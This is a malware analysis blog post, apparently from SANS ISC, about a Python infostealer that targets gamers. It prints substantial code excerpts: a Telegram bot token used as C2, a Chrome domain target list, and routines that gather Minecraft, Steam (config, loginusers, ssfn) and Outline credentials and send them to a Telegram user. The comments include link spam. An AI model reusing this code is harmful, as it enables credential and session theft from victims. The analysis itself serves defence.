Python Infostealer Targeting Gamers
They are a lot of “gamers” on the Internet. They generate a lot of business around games. Many of them can be downloaded for free, but they have online shops to buy options like extra lives, weapons, suits, packages, etc. Therefore, the business of gaming is very lucrative today[1].
I spotted a malicious Python script that acts as an info stealer focusing on gamers! Based on strings found in the code, the attribution goes to Russia (“????????? ??????” can be translated to "a new connection has been established”).
Today, most Python malicious scripts use Discord as a C2, but this one uses Telegram:
bot = telebot.TeleBot(base64.b64decode("NTk1OTUwNzYxODpBQUhmNzBRcVBYMkNiNHNjSzkyZGJwZnVhTEVaQlNWdkVRWQ==").decode("utf-8"), parse_mode=None)
The script implements the classic code to steal cookies and credentials from a Chrome installation, but it also searches for resources used by gamers.
First, Chrome data is inspected, and only interesting domains are searched:
target_domain = [ "minecraft.net", "google.com", "live.com", "apple.com", "twitter.com", "spotify.com", "discord.com", "discord.gg", "blockchain.com", "coinbase.com", "paypal.com", "mojang.com", "steamcommunity.com", "steampowered.com", "origin.com", "ea.com", "ubisoft.com" ]
Then, the script searches for the presence of Minecraft:
if os.path.isdir(apps["Minecraft"]):
AccountsPath = apps["Minecraft"] + "launcher_accounts_microsoft_store.json"
with open(AccountsPath, encoding="utf-8", mode="r") as f:
file = json.load(f)
try:
for account in file["accounts"]:
ms_username = file["accounts"][account]["username"]
minecraft_username = file["accounts"][account]["minecraftProfile"]["name"]
for user in send_to_users:
bot.send_message(user, f"?Minecraft Installed\n?Microsoft: `{ms_username}`\n?Minecraft: `{minecraft_username}`", parse_mode="MARKDOWN")
except KeyError:
pass
Steam[2] is a well-known platform for downloading games. The script tries to exfiltrate useful information from a Steam setup:
try:
steam_reg = winreg.OpenKey(winreg.HKEY_CURRENT_USER, path_steam, 0, access=winreg.KEY_READ)
steampath = winreg.EnumValue(steam_reg, 2)[1]
steam_auto_login = (winreg.EnumValue(steam_reg, 8))[1]
steam_lang = (winreg.EnumValue(steam_reg, 0))[1]
steam_config = steampath + "/config/config.vdf"
steam_users = steampath + "/config/loginusers.vdf"
steam_ssfn = []
for filename in os.listdir(steampath):
if "ssfn" in filename:
steam_ssfn.append(filename)
steam_installed = True
except FileNotFoundError:
steam_auto_login = "not installed"
steam_lang = "undefined"
steam_installed = False
send_to_users = [1084445274]
for user in send_to_users:
bot.send_message(user, f"????????? ?????? `{datetime.datetime.now()}`\n?IP: `{stun.get_ip_info()}`\n?Computer Name: `{socket.gethostname()}`\n??User: `{os.getlogin()}`\n?OC: `{platform.platform()}`\n??Steam Login: `{steam_auto_login}`\n?Steam Language: `{steam_lang}`", parse_mode="MARKDOWN")
if steam_installed == True:
bot.send_message(user, "=====STEAM FILES=====", parse_mode="MARKDOWN")
bot.send_document(user, open(steam_config, "r", encoding="utf-8"), caption="steam_config")
bot.send_document(user, open(steam_users, "r", encoding="utf-8"), caption="steam_users")
for filename in steam_ssfn:
with open(f"{steampath}/{filename}", "rb") as file:
bot.send_document(user, file, caption=f"`{filename}`", parse_mode="MARKDOWN")
file.close()
They also search for Outline Manager instances:
if os.path.isdir(apps["Outline"]):
AccountsPath = apps["Outline"] + "000003.log"
with open(AccountsPath, mode="r") as file:
for string in file.read().splitlines():
if "accessKey" in string:
key = string
reg = re.compile('[^a-zA-Z0-9"@.,:/?-]')
key = reg.sub('', key)
for user in send_to_users:
bot.send_message(user, f"?Outline (LOG): `{key}`", parse_mode="MARKDOWN")
Nothing brand new with this sample except it targets gamers. Money is involved with games (sometimes a lot), so they are nice targets for attackers. Stay safe!
[1] https://newzoo.com/insights/articles/the-games-market-in-2022-the-year-in-numbers
[2] https://store.steampowered.com
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Comments
www
Nov 17th 2022
6 months ago
EEW
Nov 17th 2022
6 months ago
qwq
Nov 17th 2022
6 months ago
mashood
Nov 17th 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Dec 3rd 2022
5 months ago
isc.sans.edu
Dec 3rd 2022
5 months ago
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.
<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
isc.sans.edu
Dec 26th 2022
5 months ago
isc.sans.edu
Dec 26th 2022
5 months ago